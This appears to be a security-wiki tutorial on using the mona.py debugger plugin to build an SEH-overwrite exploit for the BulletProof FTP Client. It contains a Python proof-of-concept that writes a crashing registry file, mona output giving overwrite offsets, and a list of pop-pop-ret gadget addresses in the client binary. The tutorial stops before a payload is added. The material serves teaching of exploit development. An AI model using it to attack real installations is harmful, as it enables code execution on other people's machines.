Test

From Security Weekly Wiki
Jump to navigationJump to search
EmbedVideo does not recognize the video service "bliptv".


PaulDotCom iTunes PaulDotCom on YouTube PaulDotCom Blog PaulDotCom Facebook Fan Page Follow Us On Twitter LinkedIN Blip.TV Google+


Getting Dirty With Mona : SEH Overwrite

Despite the title, this isn't something that will legally requite opt-in if you are in the UK. This is a quick tutorial about corelan's mona.py. This tool makes me very excited, even though its been around for a while… I've just found it! And as far as I can tell, no one here has posted anything about it. So… Im going to walk through some basic exploit development with mona.py on Immunity Debugger with the following exploit POC : POC

First, we need to go to corelan to download mona and follow the setup. Which, is honestly a drag and drop operation with a few commands to get mona to output log files correctly (without overwriting)

Now, pretty much every class I've taken on exploit development has relied on metasploit to generate and find memory offsets in the stack, registers & EIP. Mona makes this process simple… Lets take a look:


We tell mona to make us a pattern for the POC, in this case 552 bytes long


!mona pc 552

Mona tells us :

Output generated by mona.py v2.0, rev 447 - Immunity Debugger

Corelan Team - https://www.corelan.be

OS : xp, release 5.1.2600

Process being debugged : _no_name (pid 0)

2013-10-17 16:25:27

Pattern of 552 bytes :

Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7A h8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7 Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3


We take that pattern, completely unique in structure, and inject it into our POC like so:



Exploit Title: BulletProof FTP Client v2010.75.0.76 Local Buffer Overflow

Version: 2010.75.0.76

Date: 2012-03-11

Author: Julien Ahrens

Homepage: http://www.inshell.net

Software Link: http://www.bpftp.com/

Tested on: Windows XP SP3 Professional German

Notes: -

Howto: Import Reg -> Start App

file="poc.reg"

junk1="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3"


poc="Windows Registry Editor Version 5.00\n\n"

poc=poc + "[HKEY_CURRENT_USER\Software\BulletProof Software\BulletProof FTP Client 2010\Options]\n"

poc=poc + "\"LogFileName\"=\"" + junk1 + "\""

try:

print "[*] Creating exploit file...\n";

writeFile = open (file, "w")

writeFile.write( poc )

writeFile.close()

print "[*] File successfully created!";

except:

print "[!] Error while creating file!";



We execute our code, in this case the python file will create a file.reg, the POC tells us why we need to put this in our registry. We then go and open our Bulletproof FTP client.

Look at that! Our pattern is show at EAX and ESB…. great…. so how does that help us?

Im not sure, if i were looking at it normally, i would be looking for EIP… however, there are many ways to get our own code to execute…. lets ask Mona!

We type in :

!Mona findmsp

(alternatively we can find offsets with !mona op xyz)

We get the following results:

[+] Looking for cyclic pattern in memory

Cyclic pattern (normal) found at 0x0012fa40 (length 552 bytes)

Stack pivot between 172 & 724 bytes needed to land in this pattern

Cyclic pattern (normal) found at 0x016657d8 (length 552 bytes)

EAX overwritten with normal pattern : 0x41366e41 (offset 408)

EBP (0x0012fbf4) points at offset 436 in normal pattern (length 116)

[+] Examining SEH chain

SEH record (nseh field) at 0x0012fbfc overwritten with normal pattern : 0x7041396f (offset 444), followed by 104 bytes of cyclic data

[+] Examining stack (entire stack) - looking for cyclic pattern

Walking stack from 0x00128000 to 0x0012fffc (0x00007ffc bytes)

0x0012fa40 : Contains normal cyclic pattern at ESP+0xac (+172) : offset 0, length 552 (-> 0x0012fc67 : ESP+0x2d4)

[+] Examining stack (entire stack) - looking for pointers to cyclic pattern

Walking stack from 0x00128000 to 0x0012fffc (0x00007ffc bytes)

0x0012da1c : Pointer into normal cyclic pattern at ESP-0x1f78 (-8056) : 0x0012fa68 : offset 40, length 512

0x0012eb3c : Pointer into normal cyclic pattern at ESP-0xe58 (-3672) : 0x0012fc24 : offset 484, length 68

0x0012eba4 : Pointer into normal cyclic pattern at ESP-0xdf0 (-3568) : 0x0012fc24 : offset 484, length 68

0x0012ebbc : Pointer into normal cyclic pattern at ESP-0xdd8 (-3544) : 0x0012fc24 : offset 484, length 68

0x0012f948 : Pointer into normal cyclic pattern at ESP-0x4c (-76) : 0x0012fa40 : offset 0, length 552

0x0012f954 : Pointer into normal cyclic pattern at ESP-0x40 (-64) : 0x0012fa40 : offset 0, length 552

0x0012f958 : Pointer into normal cyclic pattern at ESP-0x3c (-60) : 0x0012fbf4 : offset 436, length 116

0x0012f960 : Pointer into normal cyclic pattern at ESP-0x34 (-52) : 0x0012fa40 : offset 0, length 552

0x0012f99c : Pointer into normal cyclic pattern at ESP+0x8 (+8) : 0x0012fbf4 : offset 436, length 116

0x0012f9a0 : Pointer into normal cyclic pattern at ESP+0xc (+12) : 0x0012fbfc : offset 444, length 108

0x0012f9a8 : Pointer into normal cyclic pattern at ESP+0x14 (+20) : 0x0012fbf4 : offset 436, length 116

0x0012fa0c : Pointer into normal cyclic pattern at ESP+0x78 (+120) : 0x0012fb44 : offset 260, length 292

0x0012fcf8 : Pointer into normal cyclic pattern at ESP+0x364 (+868) : 0x016657d8 : offset 0, length 552

Wow, it took Mona a couple seconds to do that…. It might of taken me a while to figure all that out.

In this particular instance, the following is interesting :

[+] Examining SEH chain

SEH record (nseh field) at 0x0012fbfc overwritten with normal pattern : 0x7041396f (offset 444), followed by 104 bytes of cyclic data

Lets go look at that in the stack:



Alright, so this is an SEH overwrite exploit, so lets ask mona what to do:


!mona SEH

Our list of Pop Pop Ret:

0x004080d7 : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)

0x0040f1d8 : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)

0x0040f33c : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)

0x004124b8 : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)

0x0041e207 : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)

0x0041e248 : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)

0x0041fa2c : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)

0x004237b8 : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)

0x0042467b : pop ecx # pop ebp # ret 0x04 | startnull,asciiprint,ascii {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)

0x004246bf : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)

0x004273f1 : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)

0x0042ecb2 : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)

0x004329c3 : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)

0x004333fe : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)

0x00433429 : pop ecx # pop ebp # ret 0x04 | startnull,asciiprint,ascii {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)

0x00434a20 : pop ecx # pop ebp # ret 0x04 | startnull,asciiprint,ascii,alphanum {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)

0x00434b25 : pop ecx # pop ebp # ret 0x04 | startnull,asciiprint,ascii {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)

0x0043a5a7 : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)

0x0043a9bd : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)

0x0043d1ca : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)

0x0043d1f4 : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)

0x00444539 : pop ecx # pop ebp # ret 0x04 | startnull,asciiprint,ascii,alphanum,uppernum {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)

amazing stuff!!!

Stay turned for some more exploit fun!!!